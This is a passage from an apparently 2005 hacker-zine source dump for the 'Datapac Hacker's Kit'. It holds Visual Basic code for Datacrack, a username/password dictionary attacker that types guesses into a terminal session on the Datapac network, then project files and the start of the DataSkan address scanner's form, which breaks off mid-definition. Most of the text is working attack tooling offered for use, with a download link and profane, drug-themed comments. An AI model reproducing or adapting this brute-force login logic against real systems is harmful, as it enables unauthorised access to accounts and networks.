    white_rabbit = 1
    politics = 0
    fear_and_loathing = 0
    Shape1.FillColor = vbYellow
    cmdstop.Default = True
    cmdstart.Enabled = False
    If txtusernamecycles.Text <> 0 Or txtusernamecycles.Text <> "" Then
        strippers = True
        sheriff = txtusernamecycles.Text
    End If
    If txtpasscycle.Text <> 0 Or txtpasscycle.Text <> "" Then
        american_dream = True
        politics = txtpasscycle.Text
    End If
    lbltimerunning.Caption = Date & " " & Time
    Dim nixon As String 'nixon is a dummy variable. nixon is also a dummy.

    'we analyze the very last entery in the usernames. if the very last usrname is not jsmith
    'then we add it. we do this because there is an off by one error some where in here, and
    'god damn it, i cant find it. So im going to take the easy way out and make sure every
    'username that the attacker wants to be used is in there, + one bogus one.
    Open txtusernames.Text For Input As #1
    DoEvents
    Do Until EOF(1)
        Line Input #1, nixon
        DoEvents
    Loop
    Close #1
    If nixon <> "jsmith" Then
        Open txtusernames.Text For Append As #1
        DoEvents
        Print #1, vbCrLf
        Print #1, "jsmith"
        DoEvents
        Close #1
        DoEvents
    End If
    'ok here we calculate how far we do this shit
    Open txtusernames.Text For Input As #1
    DoEvents
    Do Until EOF(1)
        Line Input #1, nixon
        lono = lono + 1
        DoEvents
    Loop
    Close #1
    DoEvents
    Open txtpasswords.Text For Input As #1
    DoEvents
    Do Until EOF(1)
        Line Input #1, nixon
        generation = generation + 1
        DoEvents
    Loop
    Close #1
    Dim mojo_machine As Integer
    mojo_machine = generation * (lono - 1)
    DoEvents
    lbltotalcycle.Caption = mojo_machine
    DoEvents
    'setting timer1s interval
    Timer1.Interval = txtwaitsendkeys.Text
    'opening the username and passwords
    Open txtusernames.Text For Input As #1
    DoEvents
    Open txtpasswords.Text For Input As #2
    DoEvents
    Timer1.Enabled = True
End Sub

Private Sub cmdstop_Click()
    cmdstart.Enabled = True
    lsd = True
    Shape1.FillColor = vbRed
End Sub

Private Sub Timer1_Timer()
    'this is the preliminary timer. here we do things like send the datapac address
    'and initate the datapac connection with a period and set the second timers interval.
    '
    'this timer is mainly to give the user some seconds to switch over to the terminal client

    'lsd is to check if the user stoped the attack. lsd is also for getting high on.
    If lsd = True Then
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Exit Sub
    End If
    Shape1.FillColor = vbGreen
    If chkperiod.Value = True Then SendKeys (".")
    Timer2.Interval = txtwaitusername.Text
    Timer1.Enabled = False
    Timer2.Enabled = True
    'hst is the username we will send.
    Line Input #1, hst
    DoEvents
    SendKeys (txtaddress.Text)
    SendKeys (vbCr)
    DoEvents
    'ok. we need to check here if we send shit after we send the address.
    If txtaddress1.Text <> "" Then
        Timer6.Interval = txtwaitusername.Text
        Timer6.Enabled = True
        Timer2.Enabled = False
    End If
End Sub

Private Sub Timer2_Timer()
    'this is the function where we send the username

    'lsd is to check if the user stoped the attack. lsd is also for getting high on.
    If lsd = True Then
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Exit Sub
    End If
    DoEvents
    If chkusername.Value = Checked Then
        SendKeys (hst)
    End If
    'SendKeys (vbCr)
    DoEvents
    'update % complete
    lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%"
    If strippers = True Then
        'if there is extra data to send then..
        'first we check to see if it is our time to go
        'white rabbit by jefferson airplane. l33t s0ng3zwh0rz
        white_rabbit = white_rabbit + 1
        'this is for debugging and seeing what exactly is going on in the code
        ' SendKeys (" white rabbit: " & white_rabbit)
        ' SendKeys (vbCr)
        ' SendKeys ("sheriff: " & sheriff)
        ' SendKeys (vbCr)
        DoEvents
        ' MsgBox "white rabbit: " & white_rabbit & " txtcycle: " & txtusernamecycles.Text
        If txtusernamecycles.Text <= white_rabbit Then
            'MsgBox "inside of the whore!"
            white_rabbit = 0
            Timer4.Interval = txtwaitusername.Text
            Timer4.Enabled = True
            Timer2.Enabled = False
            Exit Sub
        End If
    End If
    Timer2.Enabled = False
    Timer3.Interval = txtwaitusername.Text
    Timer3.Enabled = True
    DoEvents
    If EOF(1) = True Then
        'if its the end of the usernames then we are fucking done!
        Close #1
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Shape1.FillColor = vbYellow
    End If
End Sub

Private Sub Timer3_Timer()
    'this is the function where we send the password
    lblcurrentcycle.Caption = lblcurrentcycle.Caption + 1
    'lsd is to check if the user stoped the attack. lsd is also for getting high on.
    If lsd = True Then
        MsgBox "USER STOPPED ATTACK!"
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Exit Sub
    End If
    'gonzo is the password we will send. Gonzo is also the type of journalism that hst
    'invented gonzo is writen on the fly, often tape recorded then sent to print without
    'editing or censorship. The results are often shocking and brutaly honest.
    Line Input #2, gonzo
    DoEvents
    If EOF(2) = True Then
        Close #2
        DoEvents
        Open txtpasswords.Text For Input As #2
        DoEvents
        If EOF(1) = False Then Line Input #1, hst
    End If
    SendKeys (gonzo)
    SendKeys (vbCr)
    'ooooookah. its 2 am and im getting tired already. i must be getting old. anyways..
    'this part is for if you need to send extra data to the target AFTER the username
    'and password how about some unnessesary freestyle rap in the comments of this code?
    'yo im MC code, and i rode in on a battle ship node to e-quip the hommies of datapac.
    'its one fifty subseven eleven am and im about to get a snack to keep me typin.
    'Listening to some crazy trance has got me hypin. the buildup about to explode, fuck
    'fuck fucking code off by one fence post error, i swear, if that happens again like
    'shit. fucking dandy. it took all day to get that shit correct. if some one says this
    'shit is easy they are going to get decked by my phree style hip hop wizardry like
    'potter harrey knows. thats the way the shit goes. hoes on adrenochrome want my t00lz.
    'dead cow rulez. eat it for breakfast, brunch and lunch. i got a hunch but not like back,
    'more like a camel, lord's on track while chrak is on teh rock like crack. fuck talk, we
    'want war on the whitehat. fuck a packet, i'll get my bat, like luisville. im up till dawn,
    'but i dont drink coffie. the rush of the command prompt got me high like the dope of a
    'poppy. i am not afraid to use public variables. its only sloppy to the noobies who fear
    'the unstructured source. i endorse THC the hackers choice like doobies and bongs. two
    'wrongs make a left. i hit that shit till there aint none left. bust out the bong until
    'the sun hits the lawn then thats when i pass out. my kung fu is strong. props to thompson
    'hunter s g. RIP. for skeezy. he was down with all of us. he was a hommie.
    mescaline = mescaline + 1
    If mescaline = txtpasscycle.Text Then
        Timer5.Interval = txtwaitpassword.Text
        DoEvents
        mescaline = 0
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Timer5.Enabled = True
        Exit Sub
    End If
    Timer3.Enabled = False
    Timer2.Enabled = True
    DoEvents
    '!@#$
    'we check to see if we need to send the address again
    If chkaddress.Value = Checked Then
        fear_and_loathing = fear_and_loathing + 1
        If fear_and_loathing = txtsendaddress.Text Then
            SendKeys (txtaddress.Text)
            SendKeys (vbCr)
            fear_and_loathing = 0
            If txtaddress1.Text <> "" Then
                'disabling timer 2, but we will enable it after
                'we send the shit we need
                Timer6.Interval = txtwaitpassword.Text
                Timer6.Enabled = True
                Timer2.Enabled = False
            End If
        End If
    End If
    'update % complete
    lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%"
End Sub

Private Sub Timer4_Timer()
    'here we send any extra data after the username gets sent
    Dim army_newspaper As String
    army_newspaper = txtusernamesend1.Text
    If txtusernamecycles.Text <> "0" Or txtusernamecycles.Text <> "" Then
        If txtusernamereturn.Enabled = True And chkusername.Value = Checked Then
            SendKeys (vbCr)
        End If
        SendKeys (army_newspaper)
    End If
    DoEvents
    'time for a 15 minute interbitchin. time for some poopcorn and sodapoop
    '
    'If txtusernamecycles.Text = "0" Or txtusernamecycles.Text = "" Then
    ' Timer1.Enabled = False
    ' Timer2.Enabled = False
    ' Timer3.Enabled = True
    ' Timer4.Enabled = False
    ' Timer5.Enabled = False
    ' Exit Sub
    'End If
    'now we send extra cartrage returns if needed
    If txtusernamereturn.Text <> "0" Or txtusernamereturn.Text <> "" Then
        Dim opium, hippies As Integer
        opium = txtusernamereturn.Text
        If chkusername.Value = Checked Then
            For hippies = 0 To opium
                SendKeys (vbCr)
                DoEvents
            Next hippies
        End If
    End If
    'update % complete
    lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%"
    'now we return to our regularily scheduled programming
    Timer3.Interval = txtwaitusername.Text
    Timer3.Enabled = True
    Timer4.Enabled = False
    'rem this out if it shows fuqsonz in the next run
    If EOF(1) = True Then
        'if its the end of the usernames then we are fucking done!
        Close #1
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Shape1.FillColor = vbYellow
    End If
End Sub

Private Sub Timer5_Timer()
    'this is for the extra data to send after the password is sent
    'for example, you might have to send "login" or "logon"
    'or "user" and then "login"
    'or select from a menu
    'like a sample log file might look like this:
    ' DATAPAC COMPUTERZ()R!
    'select from list:
    '
    '1) accounting
    '2) security
    '3) porn folder
    '4) networking
    '
    '>2
    '
    ' You choose security! Please enter your login name
    'USERNAME:XXXXX
    'PASSWORD:XXXXX
    'SORRY USERLOGIN FUCKING WRONG!
    '
    'select from list:
    '
    '1) accounting
    '2) security
    '3) porn folder
    'etc etc
    '....as you can see for this one, once you have a wrong username and password
    'you have to enter from the list again before you can attempt to login.

    'MsgBox "HELLO!"
    If txtpasssend1.Text <> "" Or txtpasscycle.Text <> "0" Then
        If txtpassreturn.Enabled = True Then
            SendKeys (txtpasssend1.Text)
            SendKeys (vbCr)
            DoEvents
        End If
    End If
    'sending extra return keys (if needed)
    If txtpassreturn.Text <> "" And txtpassreturn.Text <> "0" Then
        Dim okanfold, clinton As Integer
        okanfold = txtpassreturn.Text
        For clinton = 1 To okanfold
            SendKeys (vbCr)
            DoEvents
        Next clinton
        DoEvents
    End If
    Timer5.Enabled = False
    Timer4.Enabled = False
    Timer3.Enabled = False
    Timer2.Enabled = True
    DoEvents
    'wewt! it's only 2:30am and im already having visual halucinations from sleep deprivation!
    'i thought i saw my cat walk into the room, but she didnt walk into the room.
    'i've probiby been having autidutory halucinations as well, but this awesome hard hard
    'house i've been listening to is masking dat shit
    '
    'sleep deprivation rules!
    '
    'its also making me mad. fucking stupid timers! why cant vb just have a sleep() funciton
    'like in qbasic
    'fuckfuckfuck i am angry.
    'fuck
    Exit Sub
End Sub

Private Sub Timer6_Timer()
    'alrighty. this is the first part of what we need to send after we send an address.
    ' after we do whatever is needed to be done in this function, we need to re-enable
    'timer2.
    SendKeys (txtaddress1.Text)
    DoEvents
    SendKeys (vbCr)
    If txtaddressreturn.Enabled = True Then
        Dim shotgun, target_practice As Integer
        shotgun = txtaddressreturn.Text
        For target_practice = 1 To shotgun
            SendKeys (crlf)
            DoEvents
        Next target_practice
        DoEvents
    End If
    Timer6.Enabled = False
    Timer2.Enabled = True
End Sub

Private Sub txtaddress1_Change()
    If txtaddress1.Text <> "" Then
        txtaddressreturn.Enabled = True
    Else
        txtaddressreturn.Enabled = False
    End If
End Sub

Private Sub txtpasssend1_Change()
    If txtpasssend1.Text <> "" Then
        txtpassreturn.Enabled = True
        txtpasscycle.Enabled = True
    Else
        txtpassreturn.Enabled = False
        txtpasscycle.Enabled = False
    End If
End Sub

Private Sub txtusernamesend1_Change()
    If txtusernamesend1.Text <> "" Then
        txtusernamecycles.Enabled = True
        txtusernamereturn.Enabled = True
    End If
    If txtusernamesend1.Text = "" Then
        txtusernamecycles.Enabled = False
        txtusernamereturn.Enabled = False
    End If
End Sub

- frmAbout.FRM:

VERSION 5.00
Begin VB.Form frmAbout
   BorderStyle = 3 'Fixed Dialog
   Caption = "About MyApp"
   ClientHeight = 2865
   ClientLeft = 2340
   ClientTop = 1935
   ClientWidth = 5730
   ClipControls = 0 'False
   Icon = "frmAbout.frx":0000
   LinkTopic = "Form2"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 1977.474
   ScaleMode = 0 'User
   ScaleWidth = 5380.766
   ShowInTaskbar = 0 'False
   Begin VB.PictureBox picIcon
      AutoSize = -1 'True
      ClipControls = 0 'False
      Height = 540
      Left = 240
      Picture = "frmAbout.frx":0152
      ScaleHeight = 337.12
      ScaleMode = 0 'User
      ScaleWidth = 337.12
      TabIndex = 1
      Top = 240
      Width = 540
   End
   Begin VB.CommandButton cmdOK
      Cancel = -1 'True
      Caption = "OK"
      Default = -1 'True
      Height = 465
      Left = 4320
      TabIndex = 0
      Top = 2040
      Width = 1380
   End
   Begin VB.Label lblDescription
      Caption = $"frmAbout.frx":02A4
      ForeColor = &H00000000&
      Height = 690
      Left = 90
      TabIndex = 2
      Top = 1080
      Width = 5205
   End
   Begin VB.Label lblTitle
      Caption = "DataCrack"
      ForeColor = &H00000000&
      Height = 480
      Left = 1050
      TabIndex = 4
      Top = 240
      Width = 3885
   End
   Begin VB.Label lblVersion
      Caption = "Version"
      Height = 225
      Left = 1050
      TabIndex = 5
      Top = 780
      Width = 3885
   End
   Begin VB.Label lblDisclaimer
      Caption = $"frmAbout.frx":0360
      ForeColor = &H00000000&
      Height = 1065
      Left = 135
      TabIndex = 3
      Top = 1800
      Width = 3990
   End
End
Attribute VB_Name = "frmAbout"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit

' Reg Key Security Options...
Const READ_CONTROL = &H20000
Const KEY_QUERY_VALUE = &H1
Const KEY_SET_VALUE = &H2
Const KEY_CREATE_SUB_KEY = &H4
Const KEY_ENUMERATE_SUB_KEYS = &H8
Const KEY_NOTIFY = &H10
Const KEY_CREATE_LINK = &H20
Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + _
                       KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + _
                       KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL

' Reg Key ROOT Types...
Const HKEY_LOCAL_MACHINE = &H80000002
Const ERROR_SUCCESS = 0
Const REG_SZ = 1 ' Unicode nul terminated string
Const REG_DWORD = 4 ' 32-bit number

Const gREGKEYSYSINFOLOC = "SOFTWARE\Microsoft\Shared Tools Location"
Const gREGVALSYSINFOLOC = "MSINFO"
Const gREGKEYSYSINFO = "SOFTWARE\Microsoft\Shared Tools\MSINFO"
Const gREGVALSYSINFO = "PATH"

Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long

Private Sub cmdSysInfo_Click()
    Call StartSysInfo
End Sub

Private Sub cmdOK_Click()
    Unload Me
End Sub

Private Sub Form_Load()
    Me.Caption = "About " & App.Title
    lblVersion.Caption = "Version " & App.Major & "." & App.Minor & "." & App.Revision
    lblTitle.Caption = App.Title
End Sub

Public Sub StartSysInfo()
    On Error GoTo SysInfoErr

    Dim rc As Long
    Dim SysInfoPath As String

    ' Try To Get System Info Program Path\Name From Registry...
    If GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFO, gREGVALSYSINFO, SysInfoPath) Then
    ' Try To Get System Info Program Path Only From Registry...
    ElseIf GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFOLOC, gREGVALSYSINFOLOC, SysInfoPath) Then
        ' Validate Existance Of Known 32 Bit File Version
        If (Dir(SysInfoPath & "\MSINFO32.EXE") <> "") Then
            SysInfoPath = SysInfoPath & "\MSINFO32.EXE"
        ' Error - File Can Not Be Found...
        Else
            GoTo SysInfoErr
        End If
    ' Error - Registry Entry Can Not Be Found...
    Else
        GoTo SysInfoErr
    End If

    Call Shell(SysInfoPath, vbNormalFocus)

    Exit Sub
SysInfoErr:
    MsgBox "System Information Is Unavailable At This Time", vbOKOnly
End Sub

Public Function GetKeyValue(KeyRoot As Long, KeyName As String, SubKeyRef As String, ByRef KeyVal As String) As Boolean
    Dim i As Long ' Loop Counter
    Dim rc As Long ' Return Code
    Dim hKey As Long ' Handle To An Open Registry Key
    Dim hDepth As Long '
    Dim KeyValType As Long ' Data Type Of A Registry Key
    Dim tmpVal As String ' Tempory Storage For A Registry Key Value
    Dim KeyValSize As Long ' Size Of Registry Key Variable
    '------------------------------------------------------------
    ' Open RegKey Under KeyRoot {HKEY_LOCAL_MACHINE...}
    '------------------------------------------------------------
    rc = RegOpenKeyEx(KeyRoot, KeyName, 0, KEY_ALL_ACCESS, hKey) ' Open Registry Key

    If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Error...

    tmpVal = String$(1024, 0) ' Allocate Variable Space
    KeyValSize = 1024 ' Mark Variable Size

    '------------------------------------------------------------
    ' Retrieve Registry Key Value...
    '------------------------------------------------------------
    rc = RegQueryValueEx(hKey, SubKeyRef, 0, _
                         KeyValType, tmpVal, KeyValSize) ' Get/Create Key Value

    If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Errors

    If (Asc(Mid(tmpVal, KeyValSize, 1)) = 0) Then ' Win95 Adds Null Terminated String...
        tmpVal = Left(tmpVal, KeyValSize - 1) ' Null Found, Extract From String
    Else ' WinNT Does NOT Null Terminate String...
        tmpVal = Left(tmpVal, KeyValSize) ' Null Not Found, Extract String Only
    End If
    '------------------------------------------------------------
    ' Determine Key Value Type For Conversion...
    '------------------------------------------------------------
    Select Case KeyValType ' Search Data Types...
    Case REG_SZ ' String Registry Key Data Type
        KeyVal = tmpVal ' Copy String Value
    Case REG_DWORD ' Double Word Registry Key Data Type
        For i = Len(tmpVal) To 1 Step -1 ' Convert Each Bit
            KeyVal = KeyVal + Hex(Asc(Mid(tmpVal, i, 1))) ' Build Value Char. By Char.
        Next
        KeyVal = Format$("&h" + KeyVal) ' Convert Double Word To String
    End Select

    GetKeyValue = True ' Return Success
    rc = RegCloseKey(hKey) ' Close Registry Key
    Exit Function ' Exit

GetKeyError: ' Cleanup After An Error Has Occured...
    KeyVal = "" ' Set Return Val To Empty String
    GetKeyValue = False ' Return Failure
    rc = RegCloseKey(hKey) ' Close Registry Key
End Function

- Project1.VBP:

Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\System32\stdole2.tlb#OLE Automation
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Form=Form1.frm
Form=frmAbout.frm
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Datacrack"
ExeName32="datacrack.exe"
Path32="..\Binary"
Command32=""
Name="Datacrack"
HelpContextID="0"
Description="datapac dictionary attacker"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Aftermath"
VersionFileDescription="Datapac Dictionary Attacker"
VersionLegalCopyright="Copyleft Feburary 2005"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1

- Project1.VBW:

Form1 = 96, 129, 543, 511, I, 0, 0, 0, 0, C
frmAbout = 0, 0, 0, 0, C, 0, 0, 0, 0, C

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Datapac Hacker's Kit: DataSkan Source Code
by: Aftermath

Download it at:
http://www.hackcanada.com/canadian/hacking/datapac_hackers_kit.rar

According to Hack Canada:
"Includes the Datascan NUA scanner and the Datacrack username/password
dictionary attacker for windows. VB source code included."
(Notes: Form1.FRX, Form2.FRX, Form3.FRX, and frmAbout.FRX excluded due to mangled code)

- Form1.FRM:

VERSION 5.00
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form1
   BorderStyle = 1 'Fixed Single
   Caption = "DataSkan"
   ClientHeight = 6285
   ClientLeft = 1005
   ClientTop = 1575
   ClientWidth = 5775
   Icon = "Form1.frx":0000
   LinkTopic = "Form1"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 6285
   ScaleWidth = 5775
   Begin MSComDlg.CommonDialog CommonDialog1
      Left = 4080
      Top = 0
      _ExtentX = 847
      _ExtentY = 847
      _Version = 393216
   End
   Begin VB.Timer Timer3
      Left = 3600
      Top = 0
   End
   Begin VB.Frame Frame4
      Caption = "Lists"
      Height = 615
      Left = 0
      TabIndex = 31
      ToolTipText = "You can use a list rather than scan a range"
      Top = 2640
      Width = 5775
      Begin VB.CommandButton cmdcommon1
         Caption = "..."
         Enabled = 0 'False
         Height = 255
         Left = 5400
         TabIndex = 38
         Top = 240
         Width = 255
      End
      Begin VB.TextBox txtlist
         Enabled = 0 'False
         Height = 285
         Left = 2280
         TabIndex = 33
         Text = "C:\Documents and Settings\Administrator\list.TXT"
         ToolTipText = "location of list file"
         Top = 240
         Width = 3015
      End
      Begin VB.CheckBox chklist
         Caption = "Use List"
         Height = 255
         Left = 120
         TabIndex = 32
         ToolTipText = "check this box if you wish to use a list instead of scan a range"
         Top = 240
         Width = 975
      End
      Begin VB.Label Label17
         Caption = "location of list:"
         Enabled = 0 'False
         Height = 255
         Left = 1200
         TabIndex = 34
         Top = 240
         Width = 1095
      End
   End
   Begin VB.CheckBox chkperiod
      Caption = "Send Period (.)"
      Height = 255
      Left = 0
      TabIndex = 21
      ToolTipText = "a period initiates a datapac session."
      Top = 2280
      Value = 1 'Checked
      Width = 1575
   End
   Begin VB.Timer Timer2
      Left = 3120
      Top = 0
   End
   Begin VB.TextBox txtconnectwait
      Height = 285
      Left = 2160
      TabIndex = 15
      Text = "240"
      ToolTipText = "This is the time in miliseconds data will be sent to the terminal client. The lower the number the faster the scan."
      Top = 2280
      Width = 375
   End
   Begin VB.Timer Timer1
      Left = 2640
      Top = 0
   End
   Begin VB.CommandButton cmdstop
      Caption = "Stop"
      Default = -1 'True
      Height = 495
      Left = 0
      TabIndex = 14
      ToolTipText = "stop scanning"
      Top = 1080
      Width = 1575
   End
   Begin VB.CommandButton cmdstart
      Caption = "Start"
      Height = 495
      Left = 0
      TabIndex = 13
      ToolTipText = "start skannin"
      Top = 1680
      Width = 1575
   End
   Begin VB.TextBox txtseconds
      Height = 285
      Left = 2160
      TabIndex = 10
      Text = "3"
      ToolTipText = "this is the amount of seconds you will give yourself to switch over to the terminal client before keys are sent to the window"
      Top = 1920
      Width = 375
   End
   Begin VB.TextBox txtreturn
      Height = 285
      Left = 2160
      TabIndex = 7
      Text = "1"
      ToolTipText = "the amount of times to send a cartrage return (enter) to datapac after every time you attempt to connect to an address."
      Top = 1560
      Width = 375
   End
   Begin VB.Frame Frame1
      Caption = "Scan.."
      Height = 975
      Left = 0
      TabIndex = 0
      ToolTipText = "This is where you set the range of addresses to scan"
      Top = 0
      Width = 1935
      Begin VB.TextBox txtto
         Height = 285
         Left = 960
         TabIndex = 37
         Text = "9999"
         ToolTipText = "to"
         Top = 600
         Width = 855
      End
      Begin VB.TextBox txtfrom
         Height = 285
         Left = 120
         TabIndex = 36
         Text = "0000"
         ToolTipText = "from"
         Top = 600
         Width = 735
      End
      Begin VB.TextBox txtrange
         Height = 285
         Left = 960
         TabIndex = 35
         Text = "(4 digets)"
         ToolTipText = "First four numbers of every address that will be scanned."
         Top = 240
         Width = 855
      End
      Begin VB.Label Label1
         Caption = "Range:"
         Height = 255
         Left = 120
         TabIndex = 1
         Top = 240
         Width = 495
      End
   End
   Begin VB.Frame Frame2
      Caption = "Time:"
      Height = 1455
      Left = 2040
      TabIndex = 2
      ToolTipText = "Time to start and end"
      Top = 0
      Width = 3735
      Begin VB.CheckBox chkstop
         Caption = "Dont stop"
         Height = 375
         Left = 2520
         TabIndex = 30
         ToolTipText = "check this box if you wish to not stop and continue scanning until range is complete or list is done"
         Top = 960
         Width = 1095
      End
      Begin VB.CheckBox chkfrom
         Caption = "From Now"
         Height = 255
         Left = 2520
         TabIndex = 29
         ToolTipText = "Check this box if you wish to start scanning right away"
         Top = 480
         Value = 1 'Checked
         Width = 1095
      End
      Begin VB.TextBox txtfromampm
         Enabled = 0 'False
         Height = 285
         Left = 1920
         TabIndex = 28
         Text = "AM"
         ToolTipText = "start in the AM or the PM"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtfromseconds
         Enabled = 0 'False
         Height = 285
         Left = 1320
         TabIndex = 27
         Text = "00"
         ToolTipText = "start seconds"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtfromminutes
         Enabled = 0 'False
         Height = 315
         Left = 720
         TabIndex = 25
         Text = "00"
         ToolTipText = "start minutes"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtfromhours
         Enabled = 0 'False
         Height = 285
         Left = 120
         TabIndex = 23
         Text = "12"
         ToolTipText = "start hours"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtampm
         Height = 285
         Left = 1920
         TabIndex = 20
         Text = "AM"
         ToolTipText = "am/pm"
         Top = 1080
         Width = 375
      End
      Begin VB.TextBox txtsecond
         Height = 285
         Left = 1320
         TabIndex = 6
         Text = "00"
         ToolTipText = "seconds"
         Top = 1080
         Width = 375
      End
      Begin VB.TextBox txtminute
         Height = 285
         Left = 720
         TabIndex = 5
         Text = "06"
         ToolTipText = "minutes"
         Top = 1080
         Width = 375
      End
      Begin VB.TextBox txthour
         Height = 285
         Left = 120
         TabIndex = 4
         Text = "06"
         ToolTipText = "hours"
         Top = 1080
         Width = 375
      End
      Begin VB.Label Label16
         Caption = ":"
         Height = 255
         Left = 1200
         TabIndex = 26
         Top = 480
         Width = 135
      End
      Begin VB.Label Label15
         Caption = ":"
         Height = 255
         Left = 600
         TabIndex = 24
         Top = 480
         Width = 135
      End
      Begin VB.Label Label14
         Caption = "from"
         Height = 255
         Left = 120
         TabIndex = 22
         Top = 240
         Width = 615
      End
      Begin VB.Label Label12
         Caption = ":"
         Height = 255
         Left = 1200
         TabIndex = 19
         Top = 1080
         Width = 135
      End
      Begin VB.Label Label11
         Caption = ":"
         Height = 255
         Left = 600
         TabIndex = 18
         Top = 1080
         Width = 135
      End
      Begin VB.Label Label3
         Caption = "until:"
         Height = 255
         Left = 120
         TabIndex = 3
         Top = 840
         Width = 975
      End
   End
   Begin VB.Frame Frame5
      Caption = "Extra Data to send:"
      Height = 3015
      Left